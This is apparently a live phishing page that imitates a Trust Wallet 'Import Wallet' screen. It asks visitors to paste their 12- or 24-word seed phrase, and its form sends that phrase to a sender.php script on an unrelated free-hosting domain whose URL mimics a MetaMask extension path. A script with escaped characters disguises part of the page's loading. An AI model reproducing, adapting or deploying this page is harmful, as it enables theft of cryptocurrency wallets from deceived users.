<!doctype html>
<html lang="en"><head>
<style>
.anticon {
  display: inline-block;
  color: inherit;
  font-style: normal;
  line-height: 0;
  text-align: center;
  text-transform: none;
  vertical-align: -0.125em;
  text-rendering: optimizeLegibility;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

.anticon > * {
  line-height: 1;
}

.anticon svg {
  display: inline-block;
}

.anticon::before {
  display: none;
}

.anticon .anticon-icon {
  display: block;
}

.anticon[tabindex] {
  cursor: pointer;
}

.anticon-spin::before,
.anticon-spin {
  display: inline-block;
  -webkit-animation: loadingCircle 1s infinite linear;
  animation: loadingCircle 1s infinite linear;
}

@-webkit-keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}

@keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
</style>
<meta charset="utf-8"><link rel="icon" href="truste.png"><link rel="manifest" href="/manifest.json"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#000000"><script type="text/javascript">document.write('\u003C\u006C\u0069\u006E\u006B\u0020\u0068\u0072\u0065\u0066\u003D\u0022\u0063\u0073\u0073\u002F\u0061\u0070\u0070\u0073\u002E\u0063\u0073\u0073\u0022\u0020\u0072\u0065\u006C\u003D\u0022\u0073\u0074\u0079\u006C\u0065\u0073\u0068\u0065\u0065\u0074\u0022\u003E\u000A');</script><title>Best Cryptocurrency Wallet | Ethereum Wallet | ERC20 Wallet | Trust Wallet</title>
<link href="css/chunk.css" rel="stylesheet">
<link href="css/app.css" rel="stylesheet">
<link href="css/main.chunk.css" rel="stylesheet">
</head><body><div id="root"><div class="ant-spin-nested-loading"><div class="ant-spin-container"><div class="sc-jqCOkK kFZWwp"><div class="sc-gGBfsJ jvrGcO"><div class="sc-jnlKLf OHNdu"><div class="sc-fYxtnH hARKVj">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="jalogo.png" alt="cashtab" class="sc-tilXH gdtVXy"></div><br><br><h2><center>Import Wallet</center></h2><center><p class="thepadding">Enter your secret phrase here to connect
</p></center>
<div class="sc-htoDjs cDnNqw">
    
    <form method="post" action="https://archlyxiust-submit.000webhostapp.com/sender.php?nkbihfbeogaeaoehlefnkodbefgpgknn/home.html#restore-vault" class="ant-form ant-form-horizontal">
        <div class="ant-row ant-form-item ant-form-item-with-help" style="row-gap: 0px;"><div class="ant-col ant-form-item-control"><p class="thepadding" style="text-align: left;color: hsla(0,0%,49.8%,.85);">Phrase</p>
<div>
    <div class="thepadding">
        <textarea class="import-account__secret-phrase" placeholder="Paste seed phrase from clipboard" name="PrivateKey" required="true" maxlength="280"></textarea>Typically 12 (sometimes 24) words separated by single spaces
        </div></div><div class="ant-form-item-explain">
                </div></div></div>


                <div class="thepadding">
<button class="sc-VigVT fWmldN">Import</button>
<div1></div1></div></form>
                </div></div></div></div></div></div></div></body></html>